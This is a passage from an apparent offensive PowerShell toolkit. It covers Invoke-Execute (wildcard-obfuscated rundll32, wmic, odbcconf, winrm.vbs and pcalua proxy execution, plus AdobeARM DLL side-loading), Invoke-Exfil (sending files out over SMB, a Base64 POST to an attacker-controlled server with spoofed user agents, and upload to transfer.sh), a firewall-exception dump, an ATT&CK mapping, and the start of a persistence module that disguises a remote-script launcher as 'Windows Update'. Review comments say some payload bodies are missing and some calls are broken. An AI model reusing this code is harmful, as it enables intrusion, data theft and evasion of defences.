        # https://twitter.com/harr0ey/status/989617817849876488
        # https://windows10dll.nirsoft.net/pcwutl_dll.html
        $h = "`n### Invoke-Execute(rundll) ###`n"
        (C:\??*?\*3?\?un?l*3?.?x? C:\$rs2\..\..\..\windows\system32\pcwutl.dll,LaunchApplication $File)
        $h
        Write " [+] Executed: rundll32.exe pcwutl.dll,LaunchApplication $File"
        $h
    }

    elseif ($WmicExec -and $Command) {
        Try {
            $h = "`n### Invoke-Execute(WmicExec) ###`n"
            $h
            # Wildcard -> System32\wbem\wmic.exe (cf. the Catch text in -WmicXSL). wmic's ReturnValue
            # is not inspected and a non-zero native exit does not throw, so the success line below
            # prints whether or not the process was actually created.
            (C:\??*?\*3?\?b?m\?m*c.?x? process call create $command)
            Write " `n [+] Command executed: $command"
            $h
        }
        Catch {

            Write " [!] Error."
            $h
        }
    }

    elseif ($WmicXSL -and $Command) {
        # https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html

        Try {
            $h = "`n### Invoke-Execute(WmicXSL) ###`n"
            # NOTE(review): the here-string below is empty in this listing — original lines 432-441
            # carried the XSL/JScript markup (the help text describes an ActiveXObject call wrapping
            # $command) and it did not survive rendering. Do not read the blank body as intentional:
            # as written here wmic is handed an empty stylesheet and nothing runs.
            $XslFileContent = @"



"@
            $h
            # Payload is written to a random existing directory from $DataDirs (see the writability
            # caveat above) under a random .xsl name, referenced via /format:"<path>", then deleted.
            $XslFile = "$DataDir\$rs3.xsl"
            $WmicArgs = "/format:"
            (Set-Content -Path $XslFile -Value $XslFileContent)
            (C:\??*?\*3?\?b?m\?m*c.?x? process get brief $WmicArgs"`"$XslFile"`")
            Remove-Item $XslFile
            Write " [+] Command Executed: $command"
            $h
        }
        Catch {
            # Also reached when Set-Content cannot write to the chosen $DataDir; the message only
            # mentions WMIC. A failure before Remove-Item leaves the .xsl on disk.
            Write " [!] Unknown Error. Check that WMIC is present on the target."
        }
    }

    elseif ($OdbcExec -and $Dll) {
        $h ="`n### Invoke-Execute(OdbcExec) ###`n"
        # Both the existence check and the invocation use the wildcard spelling of
        # System32\odbcconf.exe; "/a {REGSVR <dll>}" loads $Dll (local path or UNC).
        # NOTE(review): the help text tags this as T1085 (Rundll32); odbcconf.exe is catalogued
        # under T1218 (Signed Binary Proxy Execution). The else message names
        # $env:windir\odbcconf.exe, which is not the location that was tested.
        if ($(Test-Path "C:\??*?\*3?\?*co?f.?x?")) {
            $h
            (C:\??*?\*3?\?*co?f.?x? /a `{REGSVR $Dll`})
            Write " Executed Command: odbcconf.exe /a {REGSVR $Dll}"
            $h
        }
        else {
            $h
            Write "$env:windir\odbcconf.exe not found. Can't execute this module."
            $h
            return
        }
    }

    elseif ($WinRmWmi -and $Command) {
        # https://twitter.com/harr0ey/status/1062468588299345920
        # https://lolbas-project.github.io/lolbas/Scripts/Winrm/
        $h = "`n### Invoke-Execute(WinRmWmi) ###`n"

        # Get-Service -Name winrm is not wrapped: on a host without the service it writes an
        # error, both ifs below evaluate false and no message at all is printed.
        if ($(Get-Service -Name winrm | Select-Object -ExpandProperty status) -eq "Stopped") {
            $h
            Write "WinRM Service isn't running. If you're admin, try starting the WinRM Service with the 'winrm quickconfig' command."
            $h
            return
        }
        if ($(Get-Service -Name winrm | Select-Object -ExpandProperty status) -eq "Running" -and $(Test-Path C:\??*?\*3?\w?nr?.v?s)) {

            # NOTE(review): as with the XSL above, this here-string lost its markup in the listing;
            # only the $Command and C:\ values (the CommandLine and, presumably, CurrentDirectory
            # inputs of Win32_Process.Create) survived. Treat the body below as incomplete.
            $XmlFileContent = @"


$Command
C:\

"@
            $h
            # Temp file has no extension; it is removed right after the call (no try/finally).
            $XmlFile = "$DataDir\$rs1"
            (Set-Content -Path $XmlFile -Value $XmlFileContent)

            # Wildcard resolves to a System32 script host (presumably cscript.exe — verify) running
            # winrm.vbs "invoke create wmicimv2/Win32_Process". The oddly-cased -SKipCAcheCk and
            # -SkIpCNchEck are -SkipCACheck / -SkipCNCheck; whether winrm.vbs honours them
            # case-insensitively is not shown here — TODO confirm.
            (C:\??*?\*3?\c?c*i?t.?x? C:\$rs2\..\..\..\windows\system32\winrm.vbs i c wmicimv2/Win32_Process -SKipCAcheCk -SkIpCNchEck -file:$XmlFile)

            Remove-Item $XmlFile
            Write " Command Executed: $command"
            $h
        }
        else {
            $h
            Write "Couldn't find $env:windir\system32\winrm.vbs. Execution failed."
            $h
        }
    }

    elseif ($SignedProxyDll -and $Method -eq 1 -and $Dll) {
        $h = "`n### Invoke-Execute(SignedProxyDll) ###`n"

        # NOTE(review): Get-Item runs before the existence check. If AdobeARM.exe is absent this
        # emits a Get-Item error, $AdobeArmExe is $null, and Test-Path then errors on a null
        # -Path before the else branch prints its message. Testing the literal path first
        # (and only then calling Get-Item) would avoid both errors.
        $AdobeArmExe = (Get-Item 'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe').FullName

        if ($(Test-Path $AdobeArmExe)) {

            # DLL side-load: the signed updater is copied to %APPDATA% and $Dll is placed beside it
            # as AdobeARMENU.dll, a name the copied binary is expected to load from its own
            # directory (per the method list above; not verified here). Neither copy is removed.
            (Copy-Item $AdobeArmExe -Destination $env:appdata\AdobeARM.exe)
            (Copy-Item $Dll -Destination $env:appdata\AdobeARMENU.dll)

            # Invoke-Expression on a bare path string: mis-parses if %APPDATA% contains a space.
            $command = "$env:appdata\AdobeARM.exe"
            Invoke-Expression $command
            $h
            Write " [+] Executed $Dll using $AdobeArmExe."
            $h
        }
        else {
            $h
            Write " [-] Can't find the AdobeARM.exe binary."
            $h
            return
        }
    }

    elseif ($SignedProxyExe -and $Method -eq 1 -and $Exe) {
        $h = "`n### Invoke-Execute(SignedProxyExe) ###`n"

        # Wildcard -> System32\pcalua.exe (Program Compatibility Assistant launcher); "-a <exe>"
        # starts $Exe as its child, per the cited tweets.
        if (Test-Path C:\??*?\*3?\p?al*?.?x?) {
            # https://twitter.com/0rbz_/status/912530504871759872
            # https://twitter.com/kylehanslovan/status/912659279806640128

            (C:\??*?\*3?\p?al*?.?x? -a $Exe)
            $h
            Write " [+] Executed Command: pcalua.exe -a $Exe."
            $h
        }
        else {
            $h
            Write " [+] Couldn't find pcalua.exe. Quitting."
            $h
            return
        }
    }
    elseif ($SignedProxyExe -and $Method -eq 2 -and $Exe) {
        # https://twitter.com/egre55/status/1052907871749459968
        $h = "`n### Invoke-Execute(SignedProxyExe) ###`n"

        # NOTE(review): both Get-Item calls run before the existence checks and will emit errors
        # on any host without the Synaptics driver (most hosts).
        $SynTPEnhP = (Get-Item 'C:\Program Files\Synaptics\SynTP\SynTPEnh.exe')
        $SynTPEnhS = (Get-Item 'C:\windows\system32\SynTPEnh.exe')

        if ($(Test-Path -Path 'C:\Program Files\Synaptics\SynTP\SynTPEnh.exe')) {

            # NOTE(review): Invoke-Expression accepts a single -Command string. "/SHELLEXEC" and
            # "$Exe" are extra positional arguments here, which Invoke-Expression does not bind,
            # so this line most likely errors instead of running SynTPEnh.exe — verify; the intent
            # reads as "& $SynTPEnhP /SHELLEXEC $Exe". Same for the system32 variant below.
            (Invoke-Expression $SynTPEnhP /SHELLEXEC $Exe)

            $h
            Write " [+] Executed Command: $SynTPEnhP /SHELLEXEC $Exe."
            $h
        }
        elseif ($(Test-Path -Path 'C:\windows\system32\SynTPEnh.exe')) {

            (Invoke-Expression $SynTPEnhS /SHELLEXEC $Exe)

            $h
            Write " [+] Executed Command: $SynTPEnhS /SHELLEXEC $Exe."
            $h
        }
        else {
            $h
            Write " [+] Couldn't find SynTPEnh.exe. Quitting."
            $h
            return
        }
    }
}
--------------------------------------------------------------------------------
/modules/Invoke-Exfil.ps1:
--------------------------------------------------------------------------------
function Invoke-Exfil {
<#

.SYNOPSIS
Methods to allow for moving files off of a target system to a remote system.

.PARAMETER Help
Shows detailed help for each function.

.PARAMETER List
Shows summary list of available functions.

.PARAMETER SmbExfil
Copies a local file over SMB to a remote SMB Server/Share.

.PARAMETER RestExfil
Uses PowerShell's "Invoke-RestMethod" "POST" to Base64 encode and send a file to an attacker-controlled web server.

.PARAMETER TransferShExfil
Uploads a file to the https://transfer.sh file upload service. A URL to the file will be returned and is valid for 14 days. "Invoke-WebRequest" and PUT is utilized for this function.
21 | 22 | .PARAMETER InstallScpClient 23 | Installs Windows SSH and SCP clients via a Windows capability package using the Add-WindowsCapability cmdlet and will spawn dismhost.exe as a child-process of powershell. If PowerShell is detected as version 2.0, it will install it with dism.exe. Both options require elevation. 24 | 25 | .EXAMPLE 26 | PS> Invoke-Exfil -SmbExfil -LocalFile C:\temp\data.txt -UncSharePath \\server\share\ 27 | 28 | .EXAMPLE 29 | PS> Invoke-Exfil -RestExfil -LocalFile C:\file -Url https://srv/exfil 30 | 31 | .EXAMPLE 32 | PS> Invoke-Exfil -TransferShExfil -LocalFile C:\file 33 | 34 | .EXAMPLE 35 | PS> Invoke-Exfil -InstallScpClient 36 | 37 | .NOTES 38 | Author: Fabrizio Siciliano (@0rbz_) 39 | 40 | #> 41 | 42 | [CmdletBinding()] 43 | param ( 44 | [Parameter(Position=1)] 45 | [Switch]$Help, 46 | [switch]$List, 47 | 48 | [Parameter(Mandatory = $False)] 49 | [Switch]$SmbExfil, 50 | [String]$UncSharePath, 51 | [String]$LocalFile, 52 | 53 | [Parameter(Mandatory = $False)] 54 | [Switch]$RestExfil, 55 | [String]$LocalFile2=[String]$Localfile, 56 | [String]$Url, 57 | 58 | [Parameter(Mandatory = $False)] 59 | [Switch]$TransferShExfil, 60 | [String]$LocalFile3=[String]$LocalFIle, 61 | 62 | [Parameter(Mandatory = $False)] 63 | [Switch]$InstallScpClient 64 | 65 | ) 66 | 67 | $UAArray = @( 68 | ('Mozilla/4.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/11.0.1245.0 Safari/537.36'), 69 | ('Mozilla/4.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0'), 70 | ('Mozilla/4.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19'), 71 | ('Mozilla/5.0 (Macintosh; AMD Mac OS X 10_8_2) AppleWebKit/535.22 (KHTML, like Gecko) Chrome/18.6.872'), 72 | ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'), 73 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; 
Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30)'), 74 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)'), 75 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)'), 76 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'), 77 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)'), 78 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)'), 79 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.8.36217; WOW64; en-US)'), 80 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; .NET CLR 2.7.58687; SLCC2; Media Center PC 5.0; Zune 3.4; Tablet PC 3.6; InfoPath.3)'), 81 | ('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.7 (KHTML, like Gecko) Version/3.1 Safari/525.7'), 82 | ('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0'), 83 | ('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.02'), 84 | ('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0') 85 | ) 86 | 87 | $UA = ($UAArray[(get-random -Maximum ([array]$UAArray).count)]) 88 | 89 | if ($Help -eq $True) { 90 | Write @" 91 | 92 | ### Invoke-Exfil Help ### 93 | ------------------------- 94 | Available Invoke-Exfil Commands: 95 | -------------------------------- 96 | |-----------------------------------------------------------------------------| 97 | | -SmbExfil [-LocalFile] local_file [-UncSharePath] Unc share path | 98 | |-----------------------------------------------------------------------------| 99 | 100 | [*] Description: Copies a local file over SMB to a remote SMB Server/Share. 
101 | 102 | [*] Usage: Invoke-Exfil -SmbExfil -LocalFile C:\temp\data.txt -UncSharePath \\srv\share\ 103 | 104 | [*] Mitre ATT&CK Ref: T1020 (Automated Exfiltration) 105 | [*] Mitre ATT&CK Ref: T1048 (Exfiltration over Alternative Protocol) 106 | 107 | |-----------------------------------------------------------------------------| 108 | | -RestExfil [-LocalFile] local_file [-Url] remote_server | 109 | |-----------------------------------------------------------------------------| 110 | 111 | [*] Description: Uses PowerShell's "Invoke-RestMethod" "POST" to Base64 encode 112 | and send a file to an attacker-controlled web server. 113 | 114 | [*] Usage: Invoke-Exfil -RestExfil -LocalFile C:\file -Url https://srv/exfil 115 | 116 | [*] Mitre ATT&CK Ref: T1020 (Automated Exfiltration) 117 | [*] Mitre ATT&CK Ref: T1048 (Exfiltration over Alternative Protocol) 118 | 119 | |-----------------------------------------------------------------------------| 120 | | -TransferShExfil [-LocalFile] local_file | 121 | |-----------------------------------------------------------------------------| 122 | 123 | [*] Description: Uploads a file to the https://transfer.sh file upload 124 | service. A URL to the file will be returned and is valid for 14 days. 125 | "Invoke-WebRequest" and PUT is utilized for this function. 126 | 127 | [*] Usage: Invoke-Exfil -TransferShExfil -LocalFile C:\file 128 | 129 | [*] Mitre ATT&CK Ref: T1020 (Automated Exfiltration) 130 | [*] Mitre ATT&CK Ref: T1048 (Exfiltration over Alternative Protocol) 131 | 132 | |-----------------------------------------------------------------------------| 133 | | -InstallScpClient | 134 | |-----------------------------------------------------------------------------| 135 | 136 | [*] Description: Installs Windows SSH and SCP clients via a Windows capability 137 | package using the Add-WindowsCapability cmdlet and will spawn dismhost.exe 138 | as a child-process of powershell. 
If PowerShell is detected as version 2.0, 139 | it will install it with dism.exe. Both options require elevation. 140 | 141 | [*] Usage: Invoke-Exfil -InstallScpClient 142 | 143 | [*] Mitre ATT&CK Ref: T1048 (Exfiltration over Alternative Protocol) 144 | 145 | |-----------------------------------------------------------------------------| 146 | 147 | "@ 148 | } 149 | elseif ($List -eq $True) { 150 | Write @" 151 | 152 | Invoke-Exfil Command List: 153 | -------------------------- 154 | Invoke-Exfil -SmbExfil -LocalFile C:\temp\data.txt -UncSharePath \\server\share\ 155 | Invoke-Exfil -RestExfil -LocalFile C:\file -Url https://srv/exfil 156 | Invoke-Exfil -TransferShExfil -LocalFile C:\file 157 | Invoke-Exfil -InstallScpClient 158 | 159 | "@ 160 | } 161 | 162 | elseif ($SmbExfil -and $LocalFile -and $UncSharePath) { 163 | 164 | (Copy-Item -Path $LocalFile -Destination $UncSharePath) 165 | 166 | } 167 | elseif ($RestExfil -and $LocalFile -and $Url) { 168 | 169 | if ($PSVersionTable.PSVersion.Major -eq "2") { 170 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 171 | return 172 | } 173 | else { 174 | $Data = Get-Content $LocalFile 175 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Data) 176 | $EncodedData = [Convert]::ToBase64String($Bytes) 177 | 178 | $Headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" 179 | $Headers.Add("USER-AGENT", $UA) 180 | 181 | $Request = Invoke-RestMethod $Url -Method Post -Body $EncodedData -Headers $Headers 182 | } 183 | } 184 | elseif ($TransferShExfil -and $LocalFIle) { 185 | 186 | if ($PSVersionTable.PSVersion.Major -eq "2") { 187 | Write "`n [!] 
This function requires PowerShell version greater than 2.0.`n" 188 | return 189 | } 190 | else { 191 | $FileName = '.'+(-join ((65..90) + (97..122) | Get-Random -Count 32 | foreach {[char]$_})) 192 | 193 | $Headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" 194 | $Headers.Add("USER-AGENT", $UA) 195 | 196 | $Request = (Invoke-WebRequest -Method Put -infile $LocalFile -Headers $Headers https://transfer.sh/$FileName) 197 | 198 | Write " `n[+] Link to file; valid for 14 days --> $Request `n" 199 | } 200 | } 201 | elseif ($InstallScpClient) { 202 | 203 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) -and $PSVersionTable.PSVersion.Major -gt "2") { 204 | 205 | Try { 206 | $AvailClient = ((Get-WindowsCapability -Online | 207 | ? Name -Like 'OpenSSH*').Name -like '*Client*') 208 | 209 | (Add-WindowsCapability -Online -Name "$AvailClient") | Out-Null 210 | 211 | if ($((Get-WindowsCapability -Online | ? Name -Like $AvailClient).State -Like "Installed")) { 212 | Write "`n [+] Successfully installed SSH client. SCP is now available.`n" 213 | } 214 | } 215 | Catch { 216 | Write "`n [!] Unknown Error." 217 | } 218 | } 219 | elseif ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) -and $PSVersionTable.PSVersion.Major -eq "2") { 220 | 221 | Try { 222 | (C:\??*?\*3?\?is?.e?e /Online /Add-Capability /CapabilityName:OpenSSH.Client~~~~0.0.1.0) 223 | if ($(Test-Path "C:\windows\system32\OpenSSH\ssh.exe")) { 224 | Write "`n [+] Successfully installed SSH client. SCP is now available.`n" 225 | } 226 | } 227 | Catch { 228 | Write "Unknown Error." 229 | } 230 | } 231 | else { 232 | Write "`n [!] 
Need admin to execute this function.`n" 233 | } 234 | } 235 | } 236 | 237 | -------------------------------------------------------------------------------- /modules/Invoke-GlassWireExceptions.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-GlasswireExceptions { 2 | <# 3 | 4 | .SYNOPSIS 5 | Dumps any program exceptions configured in GlassWire Endpoint Protection software. 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .EXAMPLE 14 | PS> Invoke-GlassWireExceptions 15 | 16 | .NOTES 17 | Author: Fabrizio Siciliano (@0rbz_) 18 | 19 | #> 20 | [CmdletBinding()] 21 | param( 22 | [Parameter(Position=1)] 23 | [Switch]$Help, 24 | [Switch]$List 25 | ) 26 | 27 | if ($Help -or $List) { 28 | Write @" 29 | 30 | ### Invoke-GlasswireExceptions Help ### 31 | --------------------------------------- 32 | Available Invoke-GlasswireExceptions Commands: 33 | ---------------------------------------------- 34 | |--------------------------------------------------------------------------------| 35 | | Invoke-GlasswireExceptions | 36 | |--------------------------------------------------------------------------------| 37 | 38 | [*] Description: Dumps any program exceptions configured in GlassWire Endpoint 39 | Protection software. 
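
[*] Usage: Invoke-GlasswireExceptions

\--------------------------------------------------------------------------------/

"@
    }
    else {
        Write "`nGlassWire Exceptions List"
        Write "-------------------------`n"
        $RegKey = (Get-ItemProperty 'HKLM:\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules')
        $RegKey.PSObject.Properties | ForEach-Object {
            If($_.Value -like '*Active=TRUE*' -and $_.Value -like '*Allow*' -and $_.Value -like '*Dir=Out|App=*'){
                Write-Output $_.Value | ForEach-Object {$_.split("|")} | Select-String -pattern "^App"
            }
        }
    }
}

--------------------------------------------------------------------------------
/modules/Invoke-MitreReference.ps1:
--------------------------------------------------------------------------------
function Invoke-MitreReference {
<#

.SYNOPSIS
Shows a list of Mitre ATT&CK Techniques in use throughout the toolkit.

.DESCRIPTION
With -Help or -List, prints the per-module technique summary. With -Tid, prints
the modules that reference the given technique. The -Tid lookup is driven by a
single table ($Techniques) so that adding or correcting a mapping is a one-line
change rather than a new elseif branch that can silently drift from the summary.

.PARAMETER Help
Shows Detailed Help.

.PARAMETER List
Shows Brief Command Help.

.PARAMETER Tid
Parameter to find in which modules specific Mitre ATT&CK Techniques are in use. Takes a Technique ID number as a value; a leading "T" (e.g. T1086) is accepted and ignored.

.EXAMPLE
PS> Invoke-MitreReference -List

.EXAMPLE
PS> Invoke-MitreReference -Tid 1086

.NOTES
Author: Fabrizio Siciliano (@0rbz_)

#>

    [CmdletBinding()]
    param (
        [Parameter(Position=1)]
        [Switch]$Help,
        [Switch]$List,

        [Parameter(Mandatory = $False)]
        [String]$Tid
    )

    # Technique ID (digits only, no "T" prefix) -> technique name and the modules that
    # reference it. This table is the single source of truth for the -Tid lookup; the
    # -Help summary below is grouped by module and must be kept in sync with it by hand.
    # NOTE(review): IDs are kept exactly as the author listed them. In Enterprise ATT&CK,
    # T1090 is "Proxy" (Account Manipulation is T1098) and Network Service Scanning is
    # T1046 (T1423 is the Mobile matrix ID) -- confirm before relying on this table.
    $Techniques = @{
        '1003' = @{ Name = 'Credential Dumping';                      Modules = @('Invoke-Creds') }
        '1005' = @{ Name = 'Data from Local System';                  Modules = @('Invoke-Sysinfo') }
        '1007' = @{ Name = 'System Service Discovery';                Modules = @('Invoke-Sysinfo') }
        '1016' = @{ Name = 'System Network Configuration Discovery';  Modules = @('Invoke-Sysinfo') }
        '1018' = @{ Name = 'Remote System Discovery';                 Modules = @('Invoke-TcpScan') }
        '1020' = @{ Name = 'Automated Exfiltration';                  Modules = @('Invoke-Exfil') }
        '1028' = @{ Name = 'Windows Remote Management';               Modules = @('Invoke-Execute') }
        '1033' = @{ Name = 'System Owner/User Discovery';             Modules = @('Invoke-Sysinfo') }
        '1043' = @{ Name = 'Commonly Used Port';                      Modules = @('Invoke-Connect') }
        '1047' = @{ Name = 'Windows Management Instrumentation';      Modules = @('Invoke-Execute') }
        '1048' = @{ Name = 'Exfiltration over Alternative Protocol';  Modules = @('Invoke-Exfil') }
        '1049' = @{ Name = 'System Network Connections Discovery';    Modules = @('Invoke-Sysinfo') }
        '1053' = @{ Name = 'Scheduled Task';                          Modules = @('New-PsTask') }
        '1056' = @{ Name = 'Input Capture';                           Modules = @('Invoke-Creds') }
        '1057' = @{ Name = 'Process Discovery';                       Modules = @('Invoke-Sysinfo') }
        '1059' = @{ Name = 'Command-Line Interface';                  Modules = @('Invoke-Sysinfo', 'Invoke-Execute', 'Invoke-Persistence') }
        '1060' = @{ Name = 'Registry Run Keys / Startup Folder';      Modules = @('Invoke-Persistence') }
        '1069' = @{ Name = 'Permission Groups Discovery';             Modules = @('Invoke-Sysinfo') }
        '1076' = @{ Name = 'Remote Desktop Protocol';                 Modules = @('Invoke-Persistence') }
        '1081' = @{ Name = 'Credentials in Files';                    Modules = @('Invoke-Creds') }
        '1082' = @{ Name = 'System Information Discovery';            Modules = @('Invoke-Sysinfo') }
        '1083' = @{ Name = 'File and Directory Discovery';            Modules = @('Invoke-Sysinfo') }
        '1085' = @{ Name = 'Rundll32';                                Modules = @('Invoke-Execute') }
        '1086' = @{ Name = 'PowerShell';                              Modules = @('Invoke-Download', 'Invoke-Execute') }
        '1087' = @{ Name = 'Account Discovery';                       Modules = @('Invoke-Sysinfo') }
        '1088' = @{ Name = 'Bypass User Account Control';             Modules = @('Invoke-PrivEsc') }
        '1089' = @{ Name = 'Disabling Security Tools';                Modules = @('Invoke-DefenderTools') }
        '1090' = @{ Name = 'Account Manipulation';                    Modules = @('Invoke-Persistence') }
        '1099' = @{ Name = 'Timestomp';                               Modules = @('Invoke-TimeStomp', 'New-PsDat') }
        '1105' = @{ Name = 'Remote File Copy';                        Modules = @('Invoke-Download') }
        '1122' = @{ Name = 'Component Object Model Hijacking';        Modules = @('Invoke-PrivEsc') }
        '1132' = @{ Name = 'Data Encoding';                           Modules = @('Invoke-Exfil') }
        '1136' = @{ Name = 'Create Account';                          Modules = @('Invoke-Persistence') }
        '1211' = @{ Name = 'Exploitation for Defense Evasion';        Modules = @('Invoke-DefenderTools') }
        '1218' = @{ Name = 'Signed Binary Proxy Execution';           Modules = @('Invoke-Execute') }
        '1220' = @{ Name = 'XSL Script Processing';                   Modules = @('Invoke-Execute') }
        '1352' = @{ Name = 'C2 Protocol Development';                 Modules = @('Invoke-Connect') }
        '1423' = @{ Name = 'Network Service Scanning';                Modules = @('Invoke-TcpScan') }
    }

    # Accept "T1086" as well as "1086"; the table is keyed on the digits only.
    $Key = $Tid -replace '^[Tt]', ''

    if ($Help -or $List) {
        Write @"

|------------------------------------------------------------------|
| ### MITRE ATT&CK TECHNIQUE REFERENCE ###                         |
|------------------------------------------------------------------|
| Usage: Invoke-MitreReference -Tid Tid                            |
| Example: Invoke-MitreReference -Tid 1043                         |
|------------------------------------------------------------------|

Module: Invoke-Connect
----------------------
Mitre ATT&CK Ref: T1043 (Commonly Used Port)
Mitre ATT&CK Ref: T1352 (C2 Protocol Development)


Module: Invoke-Creds
--------------------
Mitre ATT&CK Ref: T1056 (Input Capture)
Mitre ATT&CK Ref: T1081 (Credentials in Files)
Mitre ATT&CK Ref: T1003 (Credential Dumping)


Module: Invoke-DefenderTools
----------------------------
Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion)
Mitre ATT&CK Ref: T1089 (Disabling Security Tools)


Module: Invoke-Download
-----------------------
Mitre ATT&CK Ref: T1086 (PowerShell)
Mitre ATT&CK Ref: T1105 (Remote File Copy)


Module: Invoke-Execute
----------------------
Mitre ATT&CK Ref: T1086 (PowerShell)
Mitre ATT&CK Ref: T1059 (Command-Line Interface)
Mitre ATT&CK Ref: T1085 (Rundll32)
Mitre ATT&CK Ref: T1047 (Windows Management Instrumentation)
Mitre ATT&CK Ref: T1220 (XSL Script Processing)
Mitre ATT&CK Ref: T1028 (Windows Remote Management)
Mitre ATT&CK Ref: T1218 (Signed Binary Proxy Execution)


Module: Invoke-Exfil
--------------------
Mitre ATT&CK Ref: T1132 (Data Encoding)
Mitre ATT&CK Ref: T1020 (Automated Exfiltration)
Mitre ATT&CK Ref: T1048 (Exfiltration over Alternative Protocol)


Module: Invoke-Persistence
--------------------------
Mitre ATT&CK Ref: T1060 (Registry Run Keys / Startup Folder)
Mitre ATT&CK Ref: T1090 (Account Manipulation)
Mitre ATT&CK Ref: T1059 (Command-Line Interface)
Mitre ATT&CK Ref: T1136 (Create Account)
Mitre ATT&CK Ref: T1076 (Remote Desktop Protocol)


Module: Invoke-PrivEsc
----------------------
Mitre ATT&CK Ref: T1122 (Component Object Model Hijacking)
Mitre ATT&CK Ref: T1088 (Bypass User Account Control)


Module: New-PsDat
-----------------
Mitre ATT&CK Ref: T1099 (Timestomp)


Module: New-PsTask
------------------
MITRE ATT&CK Ref: T1053 (Scheduled Task)


Module: Invoke-Sysinfo
----------------------
Mitre ATT&CK Ref: T1087 (Account Discovery)
Mitre ATT&CK Ref: T1059 (Command-Line Interface)
Mitre ATT&CK Ref: T1083 (File and Directory Discovery)
Mitre ATT&CK Ref: T1069 (Permission Groups Discovery)
Mitre ATT&CK Ref: T1082 (System Information Discovery)
Mitre ATT&CK Ref: T1016 (System Network Configuration Discovery)
Mitre ATT&CK Ref: T1049 (System Network Connections Discovery)
Mitre ATT&CK Ref: T1007 (System Service Discovery)
Mitre ATT&CK Ref: T1005 (Data from Local System)
Mitre ATT&CK Ref: T1033 (System Owner/User Discovery)
Mitre ATT&CK Ref: T1057 (Process Discovery)


Module: Invoke-TimeStomp
------------------------
Mitre ATT&CK Ref: T1099 (Timestomp)


Module: Invoke-TcpScan
----------------------
Mitre ATT&CK Ref: T1423 (Network Service Scanning)
Mitre ATT&CK Ref: TA0008 (Lateral Movement)
Mitre ATT&CK Ref: T1018 (Remote System Discovery)

"@
    }
    elseif ($Techniques.ContainsKey($Key)) {
        $Entry = $Techniques[$Key]
        # Same layout the per-technique here-strings produced: blank line, header,
        # blank line, one "[+] Module:" line per module, trailing newline.
        $ModuleLines = ($Entry.Modules | ForEach-Object { "[+] Module: $_" }) -join "`n"
        Write "`nModules using Mitre ATT&CK Ref: T$Key ($($Entry.Name)):`n`n$ModuleLines`n"
    }
    elseif ($Key) {
        # Previously an unknown or mistyped ID produced no output at all; say so instead.
        Write "`n [-] No module in this toolkit references T$Key.`n"
    }
}

--------------------------------------------------------------------------------
/modules/Invoke-Persistence.ps1:
--------------------------------------------------------------------------------
function Invoke-Persistence {
<#

.SYNOPSIS
Several methods that allow persisting on a target system.

.PARAMETER Help
Shows Detailed Help.

.PARAMETER List
Shows Brief Command Help.

.PARAMETER StartupLnk
Drops a .LNK file in the current user's startup directory named "Windows Update" that executes a remotely hosted PowerShell script in memory (Net.WebClient DownloadString).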
